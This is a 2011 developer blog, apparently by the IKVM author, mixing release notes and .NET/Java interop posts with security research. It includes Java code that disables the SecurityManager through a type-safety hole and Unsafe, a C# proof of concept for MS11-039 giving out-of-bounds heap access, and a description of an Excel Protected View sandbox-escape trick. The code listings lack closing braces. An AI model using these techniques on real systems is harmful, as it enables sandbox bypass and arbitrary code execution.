# Monday, 01 August 2011
How To Disable the Java Security Manager

Suppose you have a type safety vulnerability in Java, you could use it to execute native code, but you can also simply disable the SecurityManager:

import java.io.*;
import java.lang.ref.*;
import java.lang.reflect.*;

class Union1 {
  ObjectStreamClass osc;
  Class c;
  AccessibleObject acc;

class Union2 {
  MyObjectStreamClass osc;
  MyClass c;
  MyAccessibleObject acc;

class MyObjectStreamClass {
  int i1;
  int i2;
  int i3;
  int i4;
  Object obj1;
  Object obj2;
  Long suid;

class MyClass {
  int i1;
  int i2;
  int i3;
  int i4;
  Object obj1;
  Object obj2;
  Object obj3;
  Object obj4;
  SoftReference<Field[]> declaredFields;
  Object obj6;
  SoftReference<Method[]> declaredMethods;
  Object obj8;

class MyAccessibleObject {
  boolean override;

class DisableSecurityManager {
  static Union1 u1 = new Union1();
  static Union2 u2;
  static Method privateGetDeclaredFields;
  static Method privateGetDeclaredMethods;

  public static void main(String[] args) throws Exception {
    u2 = TypeSafetyHole.setupUnions(u1);

  static void disableSecurityManager() throws Exception {

    Object unsafe = getField(java.util.Random.class, "unsafe").get(null);
    Method staticFieldBase = getMethod(unsafe.getClass(), "staticFieldBase");
    Method staticFieldOffset = getMethod(unsafe.getClass(), "staticFieldOffset");
    Object base_System = staticFieldBase.invoke(unsafe, System.class);
    Method getObject = getMethod(unsafe.getClass(), "getObjectVolatile");
    Method putObject = getMethod(unsafe.getClass(), "putObjectVolatile");

    SecurityManager sm = System.getSecurityManager();
    for (int i = 0; ; i += 4) {
      if (getObject.invoke(unsafe, base_System, i) == sm) {
        System.out.println("found it!");
        putObject.invoke(unsafe, base_System, i, null);

  static void initReflection() throws Exception {
    u1.osc = ObjectStreamClass.lookup(Class.class);
    u1.c = Class.class;
    u2.osc.suid = null;
    for (Method m : u2.c.declaredMethods.get()) {
      if (m.getName().equals("privateGetDeclaredFields")) {
        u1.acc = m;
        u2.acc.override = true;
        privateGetDeclaredFields = m;
      if (m.getName().equals("privateGetDeclaredMethods")) {
        u1.acc = m;
        u2.acc.override = true;
        privateGetDeclaredMethods = m;

  static Field getField(Class c, String name) throws Exception {
    Field[] fields = (Field[])privateGetDeclaredFields.invoke(c, false);
    for (Field f : fields) {
      if (f.getName().equals(name)) {
        u1.acc = f;
        u2.acc.override = true;
        return f;
    throw new Error("Field not found");

  static Method getMethod(Class c, String name) throws Exception {
    Method[] methods = (Method[])privateGetDeclaredMethods.invoke(c, false);
    for (Method m : methods) {
      if (m.getName().equals(name)) {
        u1.acc = m;
        u2.acc.override = true;
        return m;
    throw new Error("Method not found");

This code requires JDK 7. Note that you can't use reflection to access the System.security field, because it is special cased by the reflection code (cute, but not very effective).

Here's how it runs (given a suitable implementation of TypeSafetyHole):

C:\j>\jdk1.7\bin\java -Djava.security.manager DisableSecurityManager
found it!
Monday, 01 August 2011 16:27:17 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
New Development Snapshot

After a massive amount of work, we finally have a new development snapshot based on OpenJDK 7 b147. There is still a lot of work to do to implement all the new functionality, but at least all the OpenJDK code has now been integrated.

There should not be any major regressions, but if you run into any (that isn't caused by an ikvm.internal.NotYetImplementedError or System.NotImplementedException) please let us know.


  • IPv6 support is still at 0.46 level.
  • JSR-292: Only MethodHandle.invokeExact support has been implemented. Mostly untested.
  • Parallel class loading support not yet implemented.
  • java.nio.file: Standard file system incomplete.
  • java.nio.channels.AsynchronousFileChannel not yet implemented.


  • Integrated OpenJDK 7 b147.
  • New version numbering scheme: 7.0.@BUILD@.0.
  • Added ikvmc -warnaserror option (which turns all warnings into errors, as opposed to the already existing option -warnaserror: to turn specific warnings into errors).
  • Added -warnaserror to the IKVM.OpenJDK.*.dll builds.
  • Changed ikvmc not to stop on the first error encountered. Keep going until 100 errors. Note that there still are a bunch of immediately fatal errors.
  • Fixed java.io.FileOutputStream in append mode to use atomic append.
  • Fixed java.util.zip to support files larger than 2GB and added Zip64 support.
  • Made sun.misc.Unsafe.ensureClassInitialized() into an intrinsic.
  • Extended map file support for ldtoken opcode to support loading method and field tokens.
  • Fixed Thread.isCCLOverridden() bug. If the [g|s]etContextClassLoader() methods were not JITted before isCCLOverridden(), ldftn would return the JIT stub address and the vtable could contain the JITted method address.
  • Added -Xnoglobbing option to ikvm.exe.
  • Added a new (additional) naming scheme for "managed JNI" method container classes that avoids all the name collisions.
  • Moved java.awt.AWTPermission into SwingAWT assembly.
  • Added map file support for opcodes: ldarg_s, or, xor, not.
  • Fixed I18N system properties (user.language, user.country, user.variant and user.script).
  • Set sun.java.command and sun.java.launcher properties in ikvm.exe.
  • Added missing lib/ext resources.
  • Fixed ikvmstub compatibility with newer versions of ICSharpCode.SharpZipLib.dll which require the ZipEntry size to be set explicitly, otherwise the generated archive will not be compatible with older zip implementations (like Java 6's java.util.zip).
  • Fixed serialization interop bug that could cause ArrayIndexOutOfBoundsException to be thrown while writing.
  • Fixed a serialization interop bug. If an object is a subclass of a class that has readResolve() method, but the subclass doesn't have a readResolve(), we should not call the base class readResolve().
  • Bug fix. When an abstract .NET type implements System.IComparable (and hence java.lang.Comparable) the resulting stub is not usable from Java because the compareTo method is missing. This fix adds the missing method.
  • Added support for declaring exceptions on shadow interface methods.
  • Fix and enhancement. When a .NET type implements a shadowed interface, we now also publish the original interface (e.g. if the .NET type implements System.IComparable, Java code will now see java.lang.Comparable and System.IComparable). In addition, the new code makes sure that when a .NET type explicitly implements both System.IComparable and java.lang.Comparable that the Java code will not see java.lang.Comparable twice.
  • Include OpenJDK 7 java.lang.AutoCloseable interface and make it shadow System.IDisposable. Removed java.io.Closeable special casing to support IDisposable (now automatic because Closeable extends AutoCloseable).
  • IKVM.Reflection: Fixed CliHeader read bug. Thanks to Oleg Mihailik for reporting this.

Binaries available here: ikvmbin-7.0.4230.zip
OpenJDK 7 sources: openjdk7-b147-stripped.zip

Monday, 01 August 2011 11:53:21 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Monday, 11 July 2011
How to Detect if a Method is Overridden Redux

Using a clever hack is always risky. Previously I described how to use the ldftn and ldvirtftn CIL instructions to detect if a method is overriden by a subclass. It turns out that there is a problem with this trick. If the method containing the ldftn instruction is JITted before the method it refers to, the method pointer returned (and burned into the generated code) is the JIT stub, when the method subsequently is JITted the new function pointer is stored in the vtable of subsequently loaded subclasses and the detection method yields a false positive.

Here's a small C# demo that demonstrates an equivalent effect:

using System;
using System.Runtime.CompilerServices;

class Program {
  static void Main() {
    RuntimeMethodHandle m = typeof(Program).GetMethod("Foo").MethodHandle;
    new Program().Foo();

  public virtual void Foo() { }

When you run this program on .NET, it prints out two different values. One possible solution is present in the commented out line, if you uncomment that the two pointer values printed will be the same, because PrepareMethod forces the method to be JIT compiled.

Another slightly more robust method is to avoid ldftn and use ldvirtftn to get the base method as well. The downside is that you need to have an instance of an object of a class that does not override the method in question.

Finally, if you want to use this approach consider using this as an optimization and if this detection is positive, use reflection to confirm.

Monday, 11 July 2011 16:35:52 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Tuesday, 28 June 2011

Java 7 introduces try-with-resources. This is similar1 to the C# using construct. Yesterday I committed the changes necessary for IKVM to have bi-directional interop between these two. Previously, every2 Java class that implemented java.io.Closeable already automatically got an System.IDisposable for free from ikvmc, but now the new java.lang.AutoCloseable interface shadows IDisposible (similar to how java.lang.Comparable shadows System.IComparable).

The fact that AutoCloseable shadows IDisposable means that it extends IDisposable (this is not visible from Java) and that all Java code that works with AutoCloseable will accept IDisposable references.

Unfortunately this is technically a breaking change. If you have a .NET class that implements java.io.Closeable, it now also must implement IDisposable, but since that makes sense, it's likely it already does.

Since java.io.Closeable now extends java.lang.AutoCloseable, the special casing of java.io.Closeable has been removed from ikvmc.

Here's an example of using the new Java 7 try-with-resources feature on a .NET type:

import cli.System.IO.*;

public class TryWithResources {
  public static void main(String[] args) {
    try (FileStream fs = File.OpenWrite("foo.txt")) {
      fs.Write("Foo".getBytes(), 0, 3);

1 There is one important difference in that try-with-resources supports something called suppressed exceptions.
2 Not every class. If you already implement IDisposable explicitly, you don't get an extra one.

Tuesday, 28 June 2011 07:44:14 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Thursday, 23 June 2011

Entry temporarily deleted.

Update: Reposted here.

Thursday, 23 June 2011 14:29:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [3]
# Wednesday, 22 June 2011
Excel 2010 Bait-and-Switch Sandbox Escape

Office 2010 introduced a sandboxing technology for untrusted documents called Protected View. When a document is opened from an untrusted location (e.g. the Internet) it is first opened in a sandboxed process to limit the impact of document parsing bugs or other things of that nature. Only after the user has confirmed that the document is what they expect (and want to "edit" it) they click on Enable Editing to open the document outside of the sandbox in a fully functioning Office application.

Excel 2010 has a flaw that under certain conditions causes it to redownload the document when the user clicks on Enable Editing. This allows a malicious website to initially provide a safe document and subsequently after the user decides to trust the document to provide a different malicious document.

Here's an example.

After you click on the button, IE will show a dialog asking if you want to Open or Save. Click Open. Now the harmless.xlsx document opens. Next click on Enable Editing. Excel will now crash because it attempts to load a malformed document (note that this is just a null pointer dereference and is very unlikely to be exploitable).

For effect I chose to provide a crashing document, but you can also replace the .xlsx with an .xlsm (a document with macros) and Excel will happily load it (to enable macros the user will have to explicitly click on Enable Content).

This demo is confirmed to work on Windows 7 with IE 9 and Excel 2010. All fully patched.

Wednesday, 22 June 2011 08:25:10 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Tuesday, 21 June 2011
How to Run Unpatched CLR Side-by-Side

If you want to investigate a CLR security patch, you can of course setup a VM where you don't install the patch or you can simply not install the patch until after the investigation is done. I've done both in the past, but when I was reverse engineering MS10-060 I decide to try something different.

One of the advantages (and disadvantages) of the .NET Framework over Java or Mono is that it "integrates" with the OS. This means that you can't simply install two different versions of .NET 2.0 (for example) on your machine, but you can install .NET 1.1, .NET 2.0 and .NET 4.0 side-by-side. So I assumed that it should also be possible to have multiple versions of .NET 2.0 "installed" on your system. To test this I created a Hello World app with the following app.config:

<?xml version="1.0" encoding="utf-8" ?>
        <supportedRuntime version="v2.0.66666"/>
        <requiredRuntime version="v2.0.66666"/>

Then I fired up Process Monitor and started looking at what happened if I tried to run the Hello World app.

It turns out that this is enough to make mscoree.dll look for the CLR in the %windir%\Microsoft.NET\Framework\v2.0.66666 directory for the runtime version to use. When that fails it gives you a message box asking if you want to install the .NET Framework v2.0.66666.

The obvious next step is to xcopy /s the contents of the v2.0.50727 directory into the v2.0.66666 directory. Now the Hello World app runs using mscorwks.dll and mscorjit.dll from the v2.0.66666 directory, so the contents of the v2.0.66666 can be replaced with the unpatched versions.

For the MS11-039 patch, I also wanted the unpatched System.dll and at this point it was still being loaded from the GAC. Back to Process Monitor which showed that the CLR was looking for a file named fusion.localgac in the v2.0.66666 directory, so that looked promising. After creating this file (content doesn't matter), I started getting assembly load failures and after copying the unpatched framework assemblies into the application directory the app ran successfully.

Now I could comfortably develop and test the PoC on my main system, without being vulnerable (if someone knew that I have this unpatched version installed, they could try to attack me specifically, but that would fail as I've disabled running .NET code in the browser because Microsoft takes too long to patch publicly known vulnerabilities).

Tuesday, 21 June 2011 09:48:07 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]
# Thursday, 16 June 2011
MS11-039 Vulnerability Details

Tuesday Microsoft released two .NET security bulletins, one of which MS11-039 I will discuss here.

The patch updated System.dll and diffing the updated assembly with the previous version shows that they've added additional parameter validation to the Socket Send and Receive APIs that take IList<ArraySegment> parameters.

The fix consists of validating the Offset and Count properties of the passed in ArraySegment values. If you read the ArraySegment constructor documentation, you see that it throws an ArgumentException if the offset or count are not in range, but given that ArraySegment is a value type, it is easy to break this "invariant" by taking advantage of the non-atomicity of value assignment.

Here's an example the exploits the bug to create a magical array that allows negative indexing (and arbitrary heap access, trivially adaptable to an exploit to run arbitrary code):

using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Net;
using System.Threading;

  static byte[] buf1;
  static byte[] buf2;
  static ArraySegment<byte> seg;

  static void Main(string[] args)
    Socket server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
    server.Bind(new IPEndPoint(IPAddress.Loopback, 0));
    Socket client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
    Socket conn = server.Accept();
    List<ArraySegment<byte>> buffers = new List<ArraySegment<byte>>();

    buf1 = new byte[0];
    buf2 = new byte[1000];

    for (int i = 0; i < buf2.Length; i++)
      buf2[i] = 0xFF;

    Thread mutator = new Thread(Mutator);


    ArraySegment<byte> grab;
    for (; ; )
      grab = seg;
      if (grab.Array.Length == 0 && grab.Count != 0)
        Console.WriteLine("got it!");

    SocketError errorCode;
    buffers[0] = grab;
    conn.Receive(buffers, SocketFlags.None, out errorCode);


  static void Mutator()
    for (; ; )
      seg = new ArraySegment<byte>(buf1, 0, 0);
      seg = new ArraySegment<byte>(buf2, 0, 1000);
Thursday, 16 June 2011 10:35:25 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
# Friday, 10 June 2011

I'll be at the following conferences this summer:

Send me an e-mail if you want to meet up for a chat.

Friday, 10 June 2011 07:13:15 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Wednesday, 18 May 2011
Implementation Dependencies

Field Ordering

A new feature in today's snapshot is that java.lang.Class.getDeclaredFields() now returns the fields in class declaration order for ikvmc compiled code (dynamically compiled code always did this).

This is not required by the specification, but recently after debugging a complex piece of code that failed when compiled with ikvmc because of a field ordering dependency I did some more thinking and came up with a way to cheaply retain the field ordering.


Like Java reflection, System.Reflection makes no promises about ordering, so how do you retain the ordering without adding additional bookkeeping overhead? The key lies in IKVM.Reflection, since ikvmc now uses IKVM.Reflection to emit the metadata I know how to make sure that fields are emitted in a particular order and that this gives them increasing metadata tokens.

So all I had to do is make a minor modification to ikvmc to define the fields in the same order as they are defined in the class file and in the runtime reflection code sort the FieldInfo array returned by Type.GetFields() by metadata token.

Annotations by Proxy

The JDK implements annotations by using java.lang.reflect.Proxy to implement the annotation interface. This is an implementation decision and not promised by the spec anywhere, but predictably there is also code that (for no good reason) assumes that annotations are always implemented by java.lang.reflect.Proxy.

This code failed on ikvmc compiled code, because there I generated .NET custom attributes that implement the annotation interface and simply returned the custom attribute object.

So I've changed the annotation reflection code to now return a java.lang.reflect.Proxy as well (for compatibility, the custom attribute annotations still implement the annotation interface).


You can write whatever you want in the specification, but when an ecosystem is dominated by one implementation, people are going to write against the implementation, not the specification.

This is not just annoying for alternative implementations, but the dominant implementation also suffers, because in subsequent versions you have far less freedom in evolving your implementation.

Wednesday, 18 May 2011 08:23:51 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]